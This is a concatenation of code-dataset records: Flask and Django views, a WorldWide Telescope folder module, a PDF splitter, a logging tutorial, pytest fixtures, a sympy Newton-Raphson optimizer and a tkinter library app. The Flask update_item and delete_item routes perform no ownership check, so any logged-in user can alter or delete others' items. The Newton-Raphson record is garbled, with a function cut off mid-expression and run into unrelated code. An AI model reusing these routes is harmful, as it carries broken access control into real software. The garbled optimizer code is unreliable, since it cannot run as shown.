List.query.filter_by(id=list_id).first_or_404()\n #check if list exists\n if p_list is None:\n return redirect(url_for('main.index'))\n #create form and validate\n form = None\n #check if current_user is the owner of the list\n if current_user.id == p_list.user_id:\n form = AddItemForm()\n if form.validate_on_submit():\n new_item = Item(name=form.name.data,\n description=form.description.data,\n status=form.status.data)\n p_list.add_item(new_item)\n db.session.commit()\n return redirect(url_for('lists.prep_list', list_id=p_list.id))\n return render_template('lists/list.html', p_list=p_list, form=form)\n\n@bp_lists.route('/update_item/', methods=['GET', 'POST'])\n@login_required\ndef update_item(item_id):\n item = Item.query.filter_by(id=item_id).first_or_404()\n\n #check if user is authorized update the item\n\n #check if item exists\n if item is None:\n return redirect(url_for('main.index'))\n \n #create form to update list\n form = UpdateListItem()\n if form.validate_on_submit():\n item.update_status(form.status.data)\n db.session.commit()\n return redirect(url_for('lists.prep_list', list_id=item.list.id))\n return render_template('lists/update_item.html', form=form, item=item)\n\n@bp_lists.route('/delete_item/', methods=['GET', 'POST'])\n@login_required\ndef delete_item(item_id):\n item = Item.query.filter_by(id=item_id).first_or_404()\n \n #check if item exists\n if item is None:\n return redirect(url_for('main.index'))\n \n #delete item\n mylist = item.list\n mylist.remove_item(item)\n db.session.delete(item)\n db.session.commit()\n return redirect(url_for('lists.prep_list', list_id=mylist.id))\n\n","sub_path":"application/lists/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"198967606","text":"# coding=utf-8\nimport json\nimport urllib\nfrom django.views.decorators.csrf import csrf_exempt\nimport pytz\nimport datetime\nfrom django.conf import settings\nfrom bonree_task.bonree_client import BonreeClient\nfrom meta.models import Alert\nfrom tools.api_tool import api_except, log_params, json_response\nfrom meta.models import AlertDefine\nfrom meta.handler import CallbackHandler\nfrom tools.log_tool import get_logger\nfrom cmdb_ops_client.ops_client import query_first_instance_data, query_all_instance_data, \\\n query_first_relation_instance, query_all_view_datas\n\nlogger = get_logger()\n\nALERT_DEFINE = None\n\n\ndef init_alert_define():\n alert_defines = AlertDefine.objects.filter(name=\"Bonree告警\", severity=AlertDefine.HIGH, nature=AlertDefine.ADAC)\n if not alert_defines:\n alert_define = AlertDefine()\n alert_define.name = \"Bonree告警\"\n alert_define.desc = \"自动生成定义:Bonree告警\"\n alert_define.nature = AlertDefine.ADAC\n alert_define.severity = AlertDefine.HIGH\n alert_define.enabled = True\n alert_define.save()\n else:\n alert_define = alert_defines.first()\n\n global ALERT_DEFINE\n ALERT_DEFINE = alert_define\n\n\ninit_alert_define()\n\n\ndef domain_part_from_url(url):\n \"\"\"\n 用url中截取出域名部分\n :param url:\n :return:\n \"\"\"\n proto, rest = urllib.splittype(url)\n if proto is None:\n rest = '//' + rest\n domain, rest = urllib.splithost(rest)\n domain = domain.split(':')[0]\n return domain\n\n\ndef resolve_detail_log(alert_info):\n \"\"\"\n 解析博睿告警日详细日志。日志样例见最后注释部分。\n :param alert_info:\n :return:\n \"\"\"\n role_url = alert_info.get('role_url', '')\n alert_type = alert_info.get('alert_type')\n msg = '[测试url]:{url}\\n未获取到详细信息'.format(url=role_url)\n 
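# --- Editorial sketch (not a dataset record): the Python 2 domain extraction
# used by domain_part_from_url above. urllib.splittype/splithost are Python 2
# APIs; the Python 3 equivalent is urllib.parse.urlsplit(url).hostname.
import urllib

proto, rest = urllib.splittype('http://www.example.com:8080/check?probe=1')
# proto == 'http', rest == '//www.example.com:8080/check?probe=1'
domain, rest = urllib.splithost(rest)  # ('www.example.com:8080', '/check?probe=1')
domain = domain.split(':')[0]          # 'www.example.com'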
try:\n # 根据不同的告警类型做日志解析以获取详细信息\n log_detail_str = alert_info['log_detail']\n log_detail_str = log_detail_str[log_detail_str.index('{'):]\n json_detail = json.loads(log_detail_str)\n\n if alert_type == 2:\n headers = json_detail['statisJson']['header']\n dataArr = json_detail['statisJson']['dataArr']\n msg = '[测试url]:{url}\\n'.format(url=role_url)\n msg += '[alert_name]:{alert_name}\\n'.format(alert_name=alert_info.get('alert_name'))\n for header in headers:\n msg += '[{text}]:{value}\\n'.format(text=header['text'], value=dataArr[0][header['value']])\n else:\n header = json_detail['total']['header'][0]\n header_text = header['text'] # 监控项名称\n header_value = header['value'] # 监控项变量名\n header_dw = header['dw'] # 监控项单位\n data = json_detail['total']['dataArr'][0]\n factor_value = data[header_value]\n alert_count = data['BAOJINGCOUNT']\n total_count = data['SUOYOUCOUNT']\n msg = '{alert_name}\\n{url}\\n{alert_count}/{total_count}\\n{header_text} {factor_value}{header_dw}'.format(\n alert_name=alert_info.get('alert_name'), url=role_url, alert_count=alert_count, total_count=total_count,\n header_text=header_text, factor_value=factor_value, header_dw=header_dw\n )\n except Exception as e:\n logger.exception('get alert detail msg failed. Exception:%s' % str(e))\n return msg\n\n\nclass BonreeAlertHandler(CallbackHandler):\n \"\"\"\n Bonree告警接入适配器\n \"\"\"\n\n def __init__(self, alert_info):\n self.alert_info = alert_info\n super(BonreeAlertHandler, self).__init__(None)\n\n def process_data(self):\n info = self.alert_info\n\n # 从博睿告警任务监测测url中截取出域名部分\n role_url = info.get('role_url')\n domain = domain_part_from_url(role_url)\n domain_parts = domain.split('.')\n # 把域名划分为三级及以上子域名,一二级域名两部分\n sub_domain = '.'.join(domain_parts[:-2])\n second_domain = '.'.join(domain_parts[-2:])\n\n # 在cmdb中查询匹配的域名信息\n matched_sub_domain = None\n sub_domain_instances = query_all_instance_data('SubDomain', filter_string='.filter(name=\"%s\")' % sub_domain)\n for sub_domain_instance in sub_domain_instances:\n relation = query_first_relation_instance('SubDomain_DNSPodDomain_Relation',\n filter_string='.filter(source_Instance_Id=%s)' %\n sub_domain_instance['id'])\n if relation:\n dnspod_domain = query_first_instance_data('DNSPodDomain', filter_string='.filter(id=%s)' % relation[\n 'target_Instance_Id'])\n if dnspod_domain['name'] == second_domain:\n matched_sub_domain = sub_domain_instance\n break\n\n # 如果有匹配的域名,则告警的归属业务为域名的业务。如果没有匹配的域名,则告警的业务默认为network\n scope_name = ''\n if matched_sub_domain:\n scopes = query_all_view_datas('SubDomainListView',\n filter_string='.filter(id=%s)' % matched_sub_domain['id'],\n contentSelector=['scope_name'])\n scope_name = ','.join([scope['scope_name'] for scope in scopes])\n scope_name = scope_name or 'network'\n\n # 获取详情\n if info.get('log_detail'):\n msg = resolve_detail_log(info)\n else:\n msg = info.get('alert_name')\n\n self._alert_info_dict['define'] = ALERT_DEFINE\n self._alert_info_dict['src_id'] = info.get('alert_id')\n self._alert_info_dict['status'] = info.get('status')\n self._alert_info_dict['obj_id'] = matched_sub_domain['id'] if matched_sub_domain else None\n self._alert_info_dict['obj_name'] = info.get('alert_name')\n self._alert_info_dict['msg'] = msg\n self._alert_info_dict['scope'] = scope_name\n self._alert_info_dict['sub_type'] = '网络'\n\n\n@csrf_exempt\n@api_except\n@log_params\ndef callback_bonree(request):\n try:\n datetime_format_pattern = '%Y-%m-%d %H:%M:%S'\n tz = pytz.timezone(pytz.country_timezones('cn')[0])\n now = datetime.datetime.now(tz)\n start = (now - 
datetime.timedelta(minutes=int(settings.DETECT_BONREE_INTERVAL) + 1)).strftime(\n datetime_format_pattern)\n end = now.strftime(datetime_format_pattern)\n c = BonreeClient()\n status, role_list = c.get_task_list()\n if not status:\n logger.exception('get role list from Bonree failed.')\n return\n role_dict = {role['ROLE_ID']: role for role in role_list}\n\n status, alert_list = c.get_alert_list()\n if not status:\n logger.exception('get alert list from Bonree failed.')\n return\n alert_dict = {alert['alert_id']: alert for alert in alert_list}\n\n status, log_list = c.get_alertlog_list(start, end)\n if not status:\n logger.exception('get alertlog list from Bonree failed.')\n return\n logger.info('Detected {num} alerts.'.format(num=len(log_list)))\n\n problem_alert_ids = []\n # 检测到问题的报警\n alert_list = Alert.objects.filter(status=Alert.PROBLEM)\n alert_src_id_list = []\n for alert in alert_list:\n alert_src_id_list.append(alert.src_id)\n for log in log_list:\n try:\n alert_id = log.get('LOG.alert_id')\n problem_alert_ids.append(alert_id)\n\n alert = alert_dict[alert_id]\n alert_name = alert['alertname']\n alert_type = alert['alert_type']\n alert_level = log.get('LOG.alert_level')\n role_id = log.get('LOG.role_id')\n role = role_dict[str(role_id)]\n role_creator = role.get('TRUENAME')\n role_url = role.get('URL')\n\n # 忽略指定账户创建的任务\n if role_creator in settings.BONREE_IGNORE_ACCOUNT:\n continue\n\n # 有已经存在的重复告警则跳过\n if str(alert_id) in alert_src_id_list:\n continue\n\n status, detail = c.get_log_detail(log['URL'], alert_type)\n\n alert_info = {\n 'alert_id': alert_id,\n 'alert_name': alert_name,\n 'alert_type': alert_type,\n 'alert_level': alert_level,\n 'role_url': role_url,\n 'status': Alert.PROBLEM,\n 'detect_time': datetime.datetime.now(),\n 'log_detail': detail\n }\n\n logger.info('detect new bonree alert problem: %s' % str(alert_info))\n handler = BonreeAlertHandler(alert_info)\n handler.alert_action()\n except Exception as e:\n logger.exception('get bonree alert info from log failed. Exception:%s' % str(e))\n\n # 恢复的报警\n ok_alert_list = [v for k, v in alert_dict.items() if k not in problem_alert_ids]\n\n for alert in ok_alert_list:\n # 如果有需要清除的告警则修改告警状态\n if str(alert.get('alert_id')) in alert_src_id_list:\n alerting = Alert.objects.filter(src_id=str(alert.get('alert_id'))).all()\n if not alerting:\n logger.warn('Get clean alert but no problem alert.')\n for ale in alerting:\n if ale.status == Alert.PROBLEM:\n ale.t_clean()\n except Exception as e:\n logger.error(\"同步博瑞告警失败:\" + str(e), exc_info=True)\n return json_response({'status': -1, 'error': '同步博瑞告警失败.'})\n\n return json_response({'status': 0})\n","sub_path":"WiseEyeAlertService/bonree_task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"369052210","text":"# -*- mode: python; coding: utf-8 -*-\n# Copyright 2019-2021 the .NET Foundation\n# Licensed under the MIT License.\n\nfrom __future__ import absolute_import, division, print_function\n\n__all__ = \"\"\"\nFolder\nfetch_folder_tree\nmake_absolutizing_url_mutator\nmake_filesystem_url_mutator\nwalk_cached_folder_tree\n\"\"\".split()\n\nimport os.path\nimport re\nimport requests\nfrom traitlets import Bool, Instance, Int, List, Unicode, Union, UseEnum\nfrom xml.etree import ElementTree as etree\n\nfrom . 
import LockedXmlTraits, XmlSer\nfrom .abcs import UrlContainer\nfrom .enums import FolderType\n\n\nclass Folder(LockedXmlTraits, UrlContainer):\n \"\"\"A grouping of WWT content assets.\n\n Children can be: places (aka \"Items\"), imagesets, linesets, tours,\n folders, or IThumbnail objects (to be explored).\n\n \"\"\"\n\n name = Unicode(\"\").tag(xml=XmlSer.attr(\"Name\"))\n group = Unicode(\"Explorer\").tag(xml=XmlSer.attr(\"Group\"))\n url = Unicode(\"\").tag(xml=XmlSer.attr(\"Url\"))\n \"\"\"The URL at which the full contents of this folder can be downloaded in WTML\n format.\n\n \"\"\"\n thumbnail = Unicode(\"\").tag(xml=XmlSer.attr(\"Thumbnail\"))\n browseable = Bool(True).tag(xml=XmlSer.attr(\"Browseable\"))\n searchable = Bool(True).tag(xml=XmlSer.attr(\"Searchable\"))\n type = UseEnum(\n FolderType,\n default_value=FolderType.UNSPECIFIED,\n ).tag(xml=XmlSer.attr(\"Type\"))\n sub_type = Unicode(\"\").tag(xml=XmlSer.attr(\"SubType\"))\n msr_community_id = Int(0).tag(xml=XmlSer.attr(\"MSRCommunityId\"), xml_omit_zero=True)\n \"\"\"The ID number of the WWT Community that this content came from.\"\"\"\n\n msr_component_id = Int(0).tag(xml=XmlSer.attr(\"MSRComponentId\"), xml_omit_zero=True)\n \"\"\"The ID number of this content item on the WWT Communities system.\"\"\"\n\n permission = Int(0).tag(xml=XmlSer.attr(\"Permission\"), xml_omit_zero=True)\n \"TBD.\"\n\n children = List(\n trait=Union(\n [\n Instance(\"wwt_data_formats.folder.Folder\", args=()),\n Instance(\"wwt_data_formats.place.Place\", args=()),\n Instance(\"wwt_data_formats.imageset.ImageSet\", args=()),\n ]\n ),\n default_value=(),\n ).tag(xml=XmlSer.inner_list())\n\n def _tag_name(self):\n return \"Folder\"\n\n def walk(self, download=False):\n yield (0, (), self)\n\n for index, child in enumerate(self.children):\n if isinstance(child, Folder):\n if not len(child.children) and child.url and download:\n url = child.url\n child = Folder.from_url(url)\n child.url = url\n self.children[index] = child\n\n for depth, path, subchild in child.walk(download=download):\n yield (depth + 1, (index,) + path, subchild)\n else:\n yield (1, (index,), child)\n\n def mutate_urls(self, mutator):\n if self.url:\n self.url = mutator(self.url)\n if self.thumbnail:\n self.thumbnail = mutator(self.thumbnail)\n\n for c in self.children:\n c.mutate_urls(mutator)\n\n def immediate_imagesets(self):\n \"\"\"\n Generate a sequence of the imagesets defined in this folder, without\n recursion into any child folders.\n\n Returns\n -------\n A generator of tuples of ``(child_index, item_type, imageset)``, described below.\n\n Notes\n -----\n In the generated tuples, ``child_index`` is the index number of the item\n within the folder's :attr:`~Folder.children` array and ``imageset`` is\n the :class:`~wwt_data_formats.imageset.ImageSet` object contained within\n the folder. If ``item_type`` is ``None``, that indicates that the\n imageset corresponds to an imageset child that is defined directly in\n the folder contents. It may also be a string indicating that the\n imageset is defined by a different kind of potential folder child.\n Allowed values are ``\"place_imageset\"``, ``\"place_foreground\"``, or\n ``\"place_background\"``, for different imagesets that may be contained\n within a :class:`~wwt_data_formats.place.Place` item in the folder.\n\n Examples\n --------\n Consider a folder that has two children: an imageset, and a place. 
The\n place in turn defines both a\n :attr:`~wwt_data_formats.place.Place.foreground_image_set` and a\n :attr:`~wwt_data_formats.place.Place.background_image_set`. The\n generator returned by this function will yield three values: ``(0, None,\n )``, ``(1, \"place_foreground\", )``, and ``(1,\n \"place_background\", )``.\n \"\"\"\n\n from .imageset import ImageSet\n from .place import Place\n\n for index, child in enumerate(self.children):\n if isinstance(child, ImageSet):\n yield (index, None, child)\n elif isinstance(child, Place):\n if child.image_set is not None:\n yield (index, \"place_imageset\", child.image_set)\n if child.foreground_image_set is not None:\n yield (index, \"place_foreground\", child.foreground_image_set)\n if child.background_image_set is not None:\n yield (index, \"place_background\", child.background_image_set)\n\n\ndef make_absolutizing_url_mutator(baseurl):\n \"\"\"Return a function that makes relative URLs absolute.\n\n Parameters\n ----------\n baseurl : string, absolute URL\n The absolute URL with which to combine relative URLs\n\n Returns\n -------\n A mutator function suitable for use with :meth:`wwt_data_formats.abcs.UrlContainer.mutate_urls`.\n\n Notes\n -----\n This function is designed for usage with :meth:`wwt_data_formats.abcs.UrlContainer.mutate_urls`.\n It returns a mutator function that can be passed to this method. The mutator will take\n relative URLs and make them absolute by combining them with the *baseurl* argument. Input URLs\n that are already absolute will be unchanged.\n\n \"\"\"\n from urllib.parse import urljoin, urlsplit\n\n def mutator(url):\n if not url:\n return url\n if urlsplit(url).netloc:\n return url # this URL is absolute\n return urljoin(baseurl, url)\n\n return mutator\n\n\ndef make_filesystem_url_mutator(basedir):\n \"\"\"Return a function that converts relative URLs to filesystem paths.\n\n Parameters\n ----------\n basedir : string, path\n An absolute path that the relative URLs will be combined with.\n\n Returns\n -------\n A mutator function suitable for use with\n :meth:`wwt_data_formats.abcs.UrlContainer.mutate_urls`.\n\n Notes\n -----\n This function is designed for usage with\n :meth:`wwt_data_formats.abcs.UrlContainer.mutate_urls`. It returns a mutator\n function that can be passed to this method. The mutator will take relative\n URLs and convert them to filesystem paths by combining them with the\n *basedir* argument. Input URLs that are absolute will be unchanged.\n\n \"\"\"\n from urllib.parse import unquote, urlsplit\n\n def mutator(url):\n if not url:\n return url\n\n split = urlsplit(url)\n if split.netloc:\n return url # this URL is absolute\n\n # TODO: this should work with '..' 
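# --- Editorial sketch (not a dataset record): applying a URL mutator to a
# folder tree. The index.wtml path and base URL are hypothetical.
from wwt_data_formats.folder import Folder, make_absolutizing_url_mutator

f = Folder.from_file('index.wtml')
f.mutate_urls(make_absolutizing_url_mutator('http://example.org/data/'))
# every relative url/thumbnail field in the tree is now joined onto the base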
but pretty much only by luck\n return os.path.join(basedir, *(unquote(s) for s in split.path.split(\"/\")))\n\n return mutator\n\n\ndef _sanitize_name(name):\n s = re.sub(\"[^-_a-zA-Z0-9]+\", \"_\", name)\n s = re.sub(\"^_+\", \"\", s)\n s = re.sub(\"_+$\", \"\", s)\n return s\n\n\ndef fetch_folder_tree(root_url, root_cache_path, on_fetch=None):\n done_urls = set()\n\n def get_folder(url):\n if url in done_urls:\n return None, None\n\n if on_fetch is not None:\n on_fetch(url)\n resp = requests.get(url)\n resp.encoding = \"utf-8-sig\" # see LockedXmlTraits.from_url()\n elem = etree.fromstring(resp.text)\n done_urls.add(url)\n return resp.text, Folder.from_xml(elem)\n\n root_text, root_folder = get_folder(root_url)\n with open(os.path.join(root_cache_path, \"index.wtml\"), \"wt\", encoding=\"utf8\") as f:\n f.write(root_text)\n\n def walk(cur_folder, cur_cache_path):\n for index, child in enumerate(cur_folder.children):\n if not isinstance(child, Folder):\n continue\n\n text = None\n subdir_base = f\"{index:03d}_{_sanitize_name(child.name)}\"\n child_cache_path = os.path.join(cur_cache_path, subdir_base)\n\n if not len(child.children) and child.url:\n text, child = get_folder(child.url)\n if child is None:\n continue\n\n os.makedirs(child_cache_path, exist_ok=True)\n with open(\n os.path.join(child_cache_path, \"index.wtml\"), \"wt\", encoding=\"utf8\"\n ) as f:\n f.write(text)\n\n walk(child, child_cache_path)\n\n walk(root_folder, root_cache_path)\n\n\ndef walk_cached_folder_tree(root_cache_path):\n seen_urls = set()\n\n root_folder = Folder.from_file(os.path.join(root_cache_path, \"index.wtml\"))\n\n def walk(cur_treepath, cur_folder, cur_cache_path):\n yield (cur_treepath, cur_folder)\n\n for index, child in enumerate(cur_folder.children):\n child_treepath = cur_treepath + (index,)\n\n if not isinstance(child, Folder):\n yield (child_treepath, child)\n else:\n subdir_base = f\"{index:03d}_{_sanitize_name(child.name)}\"\n child_cache_path = os.path.join(cur_cache_path, subdir_base)\n\n if not len(child.children) and child.url:\n if child.url in seen_urls:\n continue\n\n seen_urls.add(child.url)\n child = Folder.from_file(\n os.path.join(child_cache_path, \"index.wtml\")\n )\n\n for sub_treepath, sub_child in walk(\n child_treepath, child, child_cache_path\n ):\n yield (sub_treepath, sub_child)\n\n for info in walk((), root_folder, root_cache_path):\n yield info\n","sub_path":"wwt_data_formats/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":10290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"261360591","text":"#! 
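# --- Editorial sketch (not a dataset record): mirroring a WTML tree and then
# walking the cache offline. URL and cache directory are hypothetical; the
# cache directory must exist before fetch_folder_tree writes index.wtml to it.
import os
from wwt_data_formats.folder import fetch_folder_tree, walk_cached_folder_tree

os.makedirs('/tmp/wtml_cache', exist_ok=True)
fetch_folder_tree('http://example.org/root.wtml', '/tmp/wtml_cache',
                  on_fetch=lambda url: print('fetching', url))
for treepath, item in walk_cached_folder_tree('/tmp/wtml_cache'):
    print(treepath, getattr(item, 'name', ''))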
python3\r\n# splitPdf.py - big pdf -> some pages of that pdf\r\n# inputs: pdf file location, new name, new destination\r\n# outputs: new pdf with new name in new destination\r\n\r\nimport PyPDF2, os, sys, pprint, getpass, datetime\r\n\r\ndate = datetime.datetime.today()\r\nmonth = date.strftime(\"%B\")\r\nday = date.strftime(\"%d\")\r\npath = 'C:\\\\Users\\\\%s\\\\Desktop\\\\English Steward' % getpass.getuser()\r\nmaterials = path + '\\\\Materials'\r\n\r\ndef search(pdf):\r\n for folderName, subfolders, filenames in os.walk(materials):\r\n for filename in filenames:\r\n if filename == pdf:\r\n return os.path.join(folderName, filename)\r\n\r\n# Main\r\n\r\n# Student name\r\nprint('Student: ', end = '')\r\nname = input()\r\n\r\n# Pdf file\r\nprint('Pdf file name: ', end='')\r\npdf = input() + '.pdf'\r\nprint('Searching for: ' + pdf + '...')\r\nlocation = search(pdf) # returns abs path of the file\r\nif location:\r\n print('Found!')\r\nelse:\r\n print('File ' + pdf + ' not found in')\r\n print(materials)\r\n# Make directory to save the split pdf\r\ndest = path + '\\\\Students\\\\' + name + '\\\\' + month + '\\\\' + day\r\nif os.path.exists(dest) == False:\r\n os.makedirs(dest, exist_ok=True)\r\nos.chdir(dest)\r\nprint(os.getcwd())\r\n \r\n# How many?\r\nprint('Starting from: ', end='')\r\npageNum = int(input()) - 1\r\nprint('Number of pages: ', end='')\r\nnumOfPages = int(input())\r\n\r\n# open file in read binary mode\r\npdf = open(location, 'rb')\r\n\r\n# reader object\r\nreader = PyPDF2.PdfFileReader(pdf)\r\n\r\n# writer object\r\nwriter = PyPDF2.PdfFileWriter()\r\n\r\nfor i in range(numOfPages):\r\n # read page\r\n page = reader.getPage(pageNum + i)\r\n # write page\r\n writer.addPage(page)\r\n\r\n# output\r\noutputFile = open('%s %s Class Material.pdf' % (month, day), 'wb')\r\nwriter.write(outputFile)\r\n\r\n# close files\r\noutputFile.close()\r\npdf.close()\r\n","sub_path":"Split Pdf/splitPdf.py","file_name":"splitPdf.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"182927244","text":"# logging statements and how to log\n\n# this is the setup code for LOGGING in PYTHON\nimport logging\n\nlogging.basicConfig(filename='myProgramLog.txt', level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n# END SETUP CODE FOR LOGGING\nlogging.disable(logging.CRITICAL)\n\nlogging.debug('Start of program')\n\ndef factorial(n):\n logging.debug('Start of factorial(%s)' % (n))\n total = 1\n for i in range(1, n + 1):\n total *= i\n logging.debug('i is %s, total is %s' % (i, total))\n\n logging.debug('Return value is %s' % (total))\n return total\n\nprint(factorial(5))\n\nlogging.debug('End of program')\n\n# debug and critical are known as \"log level\"\n\n# debug is the first and lowest log level\n\n# info level\n\n# warning level\n\n# error level\n\n# critcal is the last and highest log level\n\n\n# logging to a text file\n# in order to log to text file instead of the console, you have to change the logging.basicConfig line\n# logging.basicConfig(filename='myProgramLog.txt', level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n","sub_path":"lesson36.py","file_name":"lesson36.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275243807","text":"# -*- coding: utf-8 -*-\n\"\"\"\ngdcdatamodel.test.conftest\n----------------------------------\n\npytest setup for gdcdatamodel 
tests\n\"\"\"\nimport pytest\nimport sqlalchemy\nfrom sqlalchemy.orm import sessionmaker\n\nfrom gdc_ng_models.models import (\n download_reports,\n qcreport,\n redaction,\n released_data,\n studyrule,\n)\nfrom gdc_ng_models.snacks import database as db\n\nSession = sessionmaker()\n\n\n@pytest.fixture(scope=\"session\")\ndef db_configs():\n return db.get_configs()\n\n\n@pytest.fixture(scope=\"session\")\ndef db_engine(db_configs):\n return db.postgres_engine_factory(db_configs)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_reports_db(db_engine):\n download_reports.Base.metadata.create_all(db_engine)\n yield\n download_reports.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_qcreport_db(db_engine):\n qcreport.Base.metadata.create_all(db_engine)\n yield\n qcreport.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_redaction_log_db(db_engine):\n redaction.Base.metadata.create_all(db_engine)\n yield\n redaction.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_study_rule_db(db_engine):\n studyrule.Base.metadata.create_all(db_engine)\n yield\n studyrule.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef create_released_data_db(db_engine):\n released_data.Base.metadata.create_all(db_engine)\n yield\n released_data.Base.metadata.drop_all(db_engine)\n\n\n@pytest.fixture(scope=\"function\")\ndef db_session(db_engine):\n connection = db_engine.connect()\n transaction = connection.begin()\n session = Session(bind=connection)\n\n yield session\n\n session.close()\n transaction.rollback()\n connection.close()\n\n\n@pytest.fixture(scope=\"module\")\ndef db_module_session(db_engine):\n connection = db_engine.connect()\n transaction = connection.begin()\n session = Session(bind=connection)\n\n yield session\n\n session.close()\n transaction.rollback()\n connection.close()\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"532870281","text":"from poiskOtr_zolSech import *\nfrom sympy import *\nimport math\nimport copy\n\nx1,x2,x3,x4,l = symbols('x1 x2 x3 x4 l')\n\n\ndef getGrad(func):\n result = [diff(func,x1),diff(func,x2)]\n return result\n\n\ndef Gesse(grad):\n gesse=[]\n countArgs=len(grad)\n for i in range(0,countArgs):\n gesse.append([])\n for j in range(0,countArgs):\n gesse[i].append(diff(grad[i],'x'+str(j+1)))\n return gesse\n\ndef getValueFunc(func,point):\n if(len(point)==2):\n return func.subs({x1:point[0],x2:point[1]})\n if(len(point)==4):\n return func.subs({x1:point[0],x2:point[1],x3:point[2],x4:point[3]})\n\ndef getBestPoint(func, points):\n minValue=points[0]\n for i in range(0, len(points)):\n if(func.subs({x1:points[i][0],x2:points[i][1]}) 0):\n return getBestPoint(func, points)\n\n #print('\\n\\n\\n')\n print('--------------Искомая точка минимума-------------:\\n')\n print(curPoint)\n #print('\\n--------------Значение функции в точке минимума-------------:\\n')\n #print(getValueFunc(getStartFunc(indexFunc),curPoint))\n return curPoint\n\n","sub_path":"lab3_2/NewtonRafson.py","file_name":"NewtonRafson.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"96389153","text":"import pandas as pd\nimport numpy as np\nimport csv\nimport math\nimport sys\nimport matplotlib.pyplot as plt\nimport scipy.misc as 
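# --- Editorial sketch (not a dataset record): the getGrad/Gesse pair above
# cross-checked against sympy's built-in hessian on a small quadratic.
from sympy import symbols, diff, hessian

x1, x2 = symbols('x1 x2')
f = x1**2 + 3*x2**2 + x1*x2
grad = [diff(f, v) for v in (x1, x2)]   # [2*x1 + x2, x1 + 6*x2]
H = hessian(f, (x1, x2))                # Matrix([[2, 1], [1, 6]])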
smp\n\ndef parsingData(path):\n\tprint('=== parsing file from %s ===' % path)\n\tfilename = []\n\tnumber = -1\n\n\ttext = open(path, 'r', encoding = 'big5')\n\trows = csv.reader(text, delimiter = ',')\n\n\tfor r in rows:\n\t\tif number != -1:\n\t\t\tn_row = [float(t) for t in r[1].split(' ')]\n\t\t\tfilename.append(n_row)\n\t\tnumber += 1\t\n\n\tfilename = np.array(filename)\n\treturn filename\n\ndef parsingLabel(path):\n\tprint('=== generating label ===')\n\tfilename = pd.read_csv(path, usecols= ['label'] )\n\tfilename = np.array(filename)\n\treturn filename\n\ndef scaling(filename):\n filename = filename.reshape(filename.shape[0],48, 48,1)\n filename = filename.astype('float64')\n filename /= 255\n return filename\n\n# def plotting():\n \n\nif __name__ == '__main__':\n num = int(sys.argv[1])\n training_set = parsingData('data/train.csv')\n training_label = parsingLabel('data/train.csv')\n training_set = scaling(training_set)\n data = training_set[num].reshape((48,48))\n img = smp.toimage(data)\n img.resize((240,240))\n img.show()\n print(\"picture #%i is class#%i\" % (num, training_label[num]))\n\t\n","sub_path":"hw3/plotImage.py","file_name":"plotImage.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"265025646","text":"from django.shortcuts import render\r\nfrom hello import *\r\nfrom .forms import *\r\n\r\ndef function(request):\r\n form = MyForm()\r\n if request.method=='POST':\r\n form = MyForm(request.POST)\r\n if form.is_valid():\r\n x = int(form.data['x'])\r\n y = int(form.data['y'])\r\n return render(request, \"function.html\", {'form' : form , 'soma' : add(x , y)})\r\n return render(request, \"function.html\", {'form' : form ,'soma' : 0})\r\n\r\n\r\n\r\n","sub_path":"simple_project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"167482353","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nfrom PIL import ImageTk, Image \r\nfrom datetime import date\r\nimport datetime\r\nimport sqlite3\r\nimport sys\r\n\r\ndef exit():\r\n\tsys.exit()\r\n\r\n# Location of Database\r\ndatabase = \"C:/Users/91997/Desktop/FINAL PROJECT/library_data.db\"\r\n# Connecting Database\r\nglobal conn, cur\r\nconn = sqlite3.connect(database)\r\ncur = conn.cursor()\r\n\r\ndef check_issue(a, b):\r\n\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Book_data WHERE Book_Id = (?))\", (a,))\r\n\tdata1 = int(cur.fetchone()[0])\r\n\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Student_record WHERE Student_Id = (?))\", (b,))\r\n\tdata2 = int(cur.fetchone()[0])\r\n\tif (data1 == 1) and (data2 == 1):\r\n\t\tcur.execute(\"SELECT Token FROM Student_record WHERE Student_Id = (?)\", (b,))\r\n\t\ttoken = int(cur.fetchone()[0])\r\n\t\tcur.execute(\"SELECT Quantity FROM Book_data WHERE Book_Id = (?)\", (a,))\r\n\t\tquan = int(cur.fetchone()[0])\r\n\r\n\t\tif token == 3:\r\n\t\t\tmessagebox.showinfo(\"FULL\", \"You have already issued maximum number of books!\")\r\n\t\t\troot.destroy()\r\n\t\telif quan == 0:\r\n\t\t\tmessagebox.showinfo(\"OUT OF STOCK\", \"Book is currently 